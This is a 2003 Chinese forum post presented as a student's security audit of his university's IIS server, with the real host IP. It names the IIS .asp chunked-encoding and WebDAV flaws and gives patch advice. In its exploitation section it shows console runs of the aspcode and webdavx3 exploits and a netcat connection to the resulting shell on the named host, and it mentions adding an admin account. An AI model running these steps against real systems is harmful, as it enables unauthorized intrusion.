返回列表 发帖

一份危险惊人的主机安全检测报告

一份危险惊人的主机安全检测报告
一份危险惊人的主机安全检测报告



注意:谨以此文章献给我的父亲和母亲,感谢他们对我多年来的养育之恩。

原创声明:
中国暗域网络技术资讯站原创文章,作者 冰血封情<EvilOctal>,转载劳烦著名出处。

拙笔正文:
注意:本文已经在正式发表的前两个星期就递交到电子工业学院网络中心处理修补了!所以我们这里才使用真实IP地址和网站名。原创于2003年5月.
[检测目标]
桂林电子工业学院 网址:http://www./**iet.edu.cn/
[检测目的]
1、 义务对母校首页服务器安全性进行评估;
2、 促进学校对服 务器网络安全的重视,进而促进对整个校园网安全的重视;
[检测仪器]
1、 安全焦点的著名安全检测软件X-SCAN2.3
2、 中联绿盟袁哥的溢出程序aspcode.exe
3、 孤独剑客前辈站点收集的WebDAV漏洞专用扫描器WebDAVScan.exe
4、 孤独剑客前辈站点收集的isno大虾写的溢出程序webdavx.exe
5、 工具操作系统WINDOWS2000和WINDOWSME
6、 必备连接工具netcat.exe

[检测原理]
根据安全检测软件和漏洞专查工具对预定主机进行安全检测,根据检测结果进行安全分析,以中联绿盟和官方的安全公告作为检测和修补建议的根据……
1、 绿盟科技于2002年04月13日 16:54:04发布的IIS .asp映射分块编码远程缓冲区溢出漏洞
受影响的系统:?
Microsoft IIS 4.0- Microsoft Windows NT 4.0
Microsoft IIS 5.0- Microsoft Windows 2000
漏洞描述:
Microsoft IIS(Internet Information Server)是MS Windows系统默认自带的Web服务器软件。
IIS 4.0/5.0/5.1 ASP (Active Server Pages) ISAPI过滤器存在远程缓冲区溢出漏洞,远程攻击者可以利用此漏洞得到主机本地普通用户访问权限。
默认安装的IIS 4.0/5.0/5.1服务器加载了ASP ISAPI过滤器,它在处理分块编码传送(chunked encoding transfer)机制的代码中存在一个缓冲区溢出漏洞。攻击者通过提交恶意分块编码的数据可以覆盖heap区的内存数据,从而改变程序执行流程,执行任意攻击者指定的代码。此安全漏洞由微软自行发现,此漏洞与“Microsoft IIS 4.0/5.0 .asp映射分块编码远程缓冲区溢出漏洞”( http://security.nsfocus.com/showQuery.asp?bugID=2551 )有着相似的原理和后果。但是此漏洞同时也影响IIS 5.1,并且无法通过URLScan工具消除威胁。如果攻击者使用随机数据,可能使IIS服务崩溃(IIS 5.0/5.1会自动重启)。如果精心构造发送的数据,也可能允许攻击者执行任意代码。成功地利用这个漏洞,对于IIS 4.0,远程攻击者可以获取SYSTEM权限;对于IIS 5.0/5.1攻击者可以获取IWAM_computername用户的权限。
2、 微软公司于2003年3月17日发布的Microsoft IIS WebDAV 拒绝服3、 务漏洞
影响系统:
Microsoft IIS 5.0
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
Microsoft IIS 5.1
- Microsoft Windows XP Professional SP1
- Microsoft Windows XP Professional
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows XP 64-bit Edition SP1
- Microsoft Windows XP 64-bit Edition
漏洞描述:
Microsoft IIS是一款HTTP服务程序,IIS 5.0/5.1包含WebDAV组件。WebDAV允许WEB开发队伍和其他工作组可以使用远程WEB服务器共同协作工作。IIS 5.0/5.1在为WebDAV请求分配内存时存在问题,远程攻击者可以利用这个漏洞进行拒绝服务攻击。由于IIS 5.0/5.1在为WebDAV请求分配内存处理不正确,如果攻击者发送畸形WebDAV请求给服务器,IIS会在服务器上分配一超大的内存给这个请求。通过发送多个相同形式请求,可导致消耗服务器上所有内存而停止对正常请求进行响应。此漏洞只有在服务器上运行了索引服务和服务器允许WebDAV请求的情况下才存在。
[检测过程]
1、 开起计算机,连接互联网,在本地计算机下打开一个命令行窗口,在C:WINDOWS>后面键入ping http://www.gliet.edu.cn/,可以看见反馈IP202.103.243.105,然后是超时反馈,丢失100%,这里要顺便说说,经常有人说PING不通是安装了防火墙,这里冰血要说,不一定!
(1) 对方主机真的不在线,所以没办法回应!
(2) 方主机安装了防火墙,屏蔽了ICMP报文,不反馈ECHO数据包!
(3) 对方在注册表中进行了安全设置,不回复ICMP报文!
(4) 对方在IPsec中拒绝了PING!
这个就是学校网站主机的IP地址!不管那么多了,反正得到IP了……
得到了IP,在我们开始扫描,启动X-SCAN2.3在扫描参数里面的基本设置填好IP记住,这样PING不通的在扫描的时候一定要选择“无条件扫描”!然后,为了全面检测,我们勾选了所有的检测选项,时间长点,但是慢慢来:)
打开QQ和其他人聊了会WEBDAV漏洞,
不久扫描结果出来了(为了简短只挑选了关键的部分):
[202.103.243.105]: 端口21开放: FTP (Control)
[202.103.243.105]: 端口25开放: SMTP, Simple Mail Transfer Protocol
[202.103.243.105]: 端口80开放: HTTP, World Wide Web
[202.103.243.105]: 端口135开放: Location Service
[202.103.243.105]: 端口139开放: NETBIOS Session Service
[202.103.243.105]: 可能存在"IIS .asp映射分块编码远程缓冲区溢出"漏洞
[202.103.243.105]: "IIS漏洞"扫描完成, 发现 1.
另外,x-scan2.3是早先出的,似乎对WebDAV漏洞是无法检测(最近有更新版本可以检测到),至于这个我们使用上文提到的孤独剑客前辈站点提供的WebDAV漏洞专用工具包中的专用扫描器WebDAVScan.exe:
启动WebDAVScan.exe主程序,添入IP,开始扫描……瞬间提示发现WebDAV漏洞!!!!
下面我们对结果进行分析:
[202.103.243.105]: 端口21开放: FTP (Control)/*文件传输协议*/
冰血不知道这个是什么意思?对互联网开放FTP?是不是为了方便在网络外部的老师或者管理员管理,但是从安全角度来说真的是很危险,因为这样会留有隐患,还不知道有没有密码设置的简单的用户呢?
[202.103.243.105]: 端口25开放: SMTP, Simple Mail Transfer Protocol/*简单邮件传输协议*/
这个有可以利用的价值,但是并不是很大,因为POP此时没开放
[202.103.243.105]: 端口80开放: HTTP, World Wide Web
80端口可以用来刺探主机的相关信息,方法是打开一个命令行,在C:WINDOWS>后面键入telnet 202.103.243.105 80
指令如下:
C:WINDOWS>telnet 202.103.243.105 80
然后键入get回车后得到服务器信息……不过这里我们采用X-SCAN刺探到的,因为扫描前其实冰血封情已经用过telnet 202.103.243.105 80,但是毕竟是电子类院校,刺探到的只有“**电子工业学院”几个字:(
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sat, 12 Apr 2003 11:45:25 GMT Content-Length: 31218 Content-Type: text/html Expires: Sat, 12 Apr 2003 11:44:25 GMT Set-Cookie: ASPSESSIONIDGGGQQLRQ=CHBMFCPDNOAMCILKIBINPLIA; path=/ Cache-control: private Connection: close Proxy-Connection: close
(其实X-SCAN刺探的更加详细)
[202.103.243.105]: 端口135开放: Location Service
没什么太值得利用的,这次主要不是它,不过这里可以大致揣测对方主机的系统类型……
[202.103.243.105]: 端口139开放: NETBIOS Session Service
这次的重点不是它,但是还是顺便介绍一下,98下NETBIOS有个密码校检BUG,只检测共享密码的第一个字,只要用特定的工具就可以对共享密码长驱直入,但是从上面看似乎是NT架构的,不过是可以用网际进程连接了……
[202.103.243.105]: 可能存在"IIS .asp映射分块编码远程缓冲区溢出"漏洞
这里开始说这整个安全检测的重点,可以看到暴露了IIS .asp映射分块编码远程缓冲区溢出漏洞,前面已经介绍了这个漏洞的危险性这里就不赘述了。
[202.103.243.105]: Microsoft IIS WebDAV 拒绝服务漏洞
是2003年内3月最新发布的,前面也事先说明白了,我们这里就也不多说了!它的恐怖和严重后果冰血封情会在后面的数据处理让大家看看……
[数据处理] 以下是在模拟系统中做的,否ASP溢出要提升权限!
当冰血第一次注意到母校的主服务器存在此漏洞的时候就和陈老师说了,陈老师给了我很大的鼓励,并告诉我应该将报告递交到网络中心,而且陈老师在非典封校期间给冰血的安全检测提供宽松的环境,从而为此重大安全漏洞的及时修补画上了重要圆满的一笔!
鸣谢:桂林电子工业学院优秀的年级主任陈文武老师提供正确的思想引导!
1、这里很明显我们针对的是"IIS .asp映射分块编码远程缓冲区溢出"漏洞;
对于这个漏洞的溢出方法,主要是用aspcode.exe程序傻瓜式的就可以溢出,冰血封情还是大概说说吧具体过程如下:
运行aspcode.exe。
D:tools>aspcode

IIS ASP.DLL OVERFLOW PROGRAM 2.0
copy by yuange 2002.4.24.
welcome to my homepage http://yuange.year.net/
welcome to http://www.nsfocus.com/
usage: aspcode <server> [aspfile] [webport] [winxp]

please enter the web server: 202.103.243.105
please enter the .asp filename:index.asp
(如果不行还可以尝试default.asp、home.asp、index.asp、login.asp、search.asp、localstart.asp…学校是index.asp,但是不知道完全可以穷举,就那么几个)
nuke ip: 202.103.243.105 port 80
shellcode long 0x13e7

packet long:0x13e7

send packet 71826 bytes
recv:
c:inetpubwwwrootiisstart.asp
ok!recv 117 bytes
(这里按若干下Enter就可以了)

C:WINNTSYSTEM32>
(溢出成功)
剩下的就是添加新的管理员的帐号密码了!成功入侵!但是这里不管,后面更精彩:)
1、 Microsoft IIS WebDAV漏洞
鸣谢:这里感谢我的师傅、中国黑客联盟网络安全专家绿冰(greenice)提供相关技术指导!
具体入侵过程如下:
D:>webdavx3 202.103.243.105
IIS WebDAV overflow remote expoit by isno@xfocus.org start to try offset.
If STOP a long time, you can press ^C and telnet 202.103.243.105 7788
Try offset:0
Try offset:1
Try offset:2
Try offset:3
Waiting for iis restart……………………………………………………………………
Try offset:4
Try offset:5
Try offset:6
Waiting for iis restart……………………………………………………………………
Try offset:7
Waiting for iis restart……………………………………………………………………
Try offset:8
^C
(溢出成功……)
D:>nc -vv 202.103.243.105 7788
202.103.243.105: inverse host lookup failed: h-errno 11004:NO_DATA
(UNKNOWN)[202.103.243.105] 7788 (?) open
Microsoft Windows 2000 [version 5.00.2195]
?版权所有 1985-2000 Mcrosoft Corp.
c:WINNTsystem32>
看到了哦……
好了,先适可而止,毕竟是自己学校的主机!
清理足迹,打扫战场,整理材料,准备上交吧……


[检测建议]
冰血在和网络安全专家孤独剑客前辈谈论修补漏洞的时候,他说:从安全的角度考虑,如果“可能存在”就应该修补!孤独前辈的话铭记在心(有拍马屁的嫌疑,生鸡蛋伺候着~)
鸣谢:这里感谢中国网络安全专家孤独剑客前辈提供理论支持!
1、“IIS .asp映射分块编码远程缓冲区溢出漏洞”的修补建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
如果您不需要使用ASP脚本,您应该立刻删除".asp"的脚本映射。
可以参考如下步骤删除上述脚本映射:
1. 打开Internet 服务管理器
2. 右击你的服务器,在菜单中选择"属性"栏
3. 选择"主属性"
4. 选择 WWW 服务 | 编辑 | 主目录 | 配置
5. 在扩展名列表中删除".asp"项。
6. 保存设置,然后重启IIS服务。
厂商补丁:
Microsoft已经为此发布了一个安全公告(MS02-018)以及相应补丁:
MS02-018:Cumulative Patch for Internet Information Services (Q319733)
链接:http://www.microsoft.com/technet/security/...in/MS02-018.asp
补丁下载:
Microsoft IIS 4.0: http://www.microsoft.com/Downloads/Release...ReleaseID=37931
2、Microsoft IIS WebDAV 拒绝服务漏洞
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
使用微软提供的IIS Lockdown工具可能可以防止该漏洞。
厂商补丁:
Microsoft已经为此发布了一个安全公告(MS02-062)以及相应补丁:
MS02-062:Cumulative Patch for Internet Information Service (Q327696)
链接:http://www.microsoft.com/technet/security/...in/MS02-062.asp
补丁下载:
IIS 4.0:
http://www.microsoft.com/Downloads/Release...ReleaseID=43566
IIS 5.0:
http://www.microsoft.com/Downloads/Release...ReleaseID=43296
IIS 5.1:
32-bit:
http://www.microsoft.com/Downloads/Release...ReleaseID=43578

64-bit:
http://www.microsoft.com/Downloads/Release...ReleaseID=43602
(其实孤独前辈站点提供的检测包中就有补丁提供!!)

[检测讨论]
繁忙紧张的主机安全检测做完了,这样的结果冰血封情不用说什么了吧?我的检测报告用这个题目,也不为过吧?咱们可是电子类院校……唉
好了,冰血的话就说到这里了,我还是个学生面对这样的问题是很苍白无力的:)主要还看管理员是否重视!!对么?:)
最后!欢迎大家来我的论坛交流!中国暗域网络:http://forum.hackway.net/


[检测后记]
冰血封情为了认真的做这个检测报告,参考了大量的安全书籍,这里感谢这些书的作者!
1、北京希望电子出版社的《黑客任务实战 服务器篇》
冰血参考了该书363页有关.ASP缓冲区溢出漏洞的资料和相关观点,在此表示感谢!
2、 北京希3、 望电子出版社的《网络攻击防护编码设计》
冰血参考了该书39页有关缓冲区溢出攻击的资料和相关观点,在此表示感谢!
4、北京科海集团公司出版社的《黑客就这么几招第2版》
冰血参考了该书137页第六章有关缓冲区溢出和444页Finger漏洞资料,在此表示感谢!
5、中国电力出版社的《入侵特征与分析》
冰血参考了该书228页14章有关缓冲区溢出攻击的资料和相关观点,在此表示感谢!
9、 四川电子音像出版中心的《Windows 9x/NT/2000/XP 常见漏洞攻击与防范实战》
冰血参考了该书183页有关缓冲区溢出和206页IIS漏洞修补的资料,在此表示感谢!
10、 人民邮电出版社的《聚焦黑客——攻击手段与防护策略》
冰血参考了该书325页有关缓冲区溢出攻击的资料,在此表示感谢!
11、 人民邮电出版社的《个人用网安全与黑客防范技术》
冰血参考了该书170页有关Finger协议和308页IIS安全建议,在此表示感谢!
10、北京希望电子出版的《解读黑客 黑客是怎样炼成的》
冰血参考了该书18页第2章缓冲区溢出的资料及其部分观点,在此表示感谢!
11、电子工业出版社的《居安思危——电脑防黑防毒急救》
冰血参考了该书284页缓冲区溢出攻击资料及其相关理论,在此表示感谢!
12、民航出版社的《黑客过招》
冰血参考了该书63页缓冲区溢出攻击和136页Finger协议资料,在此表示感谢!
此外,冰血封情为了认真的做这个检测报告,还向很多高手进行求教,取得他们权威的理论支持,这里感谢这些朋友、前辈!
1、 感谢我的师傅、中国黑客联盟网络安全专家绿冰(greenice)先生给出技术咨询支持!
2、 感谢中国著名网络安全专家孤独剑客(janker)前辈给出安全漏洞修补的理论支持!

灌水广告:
——文章原创由 中国暗域网络 及 邪恶八进制 冰血封情<EvilOctal>
——Be powered by Hackway Power of Cn & EvilOctal Security Group EvilOctal
——欢迎访问 http://www.hackway.net/ & http://www.eviloctal.com/

04年以前的 那时八进制还没开:dumigou41: :dumigou41:
缥缈无极的百度博客

TOP

返回列表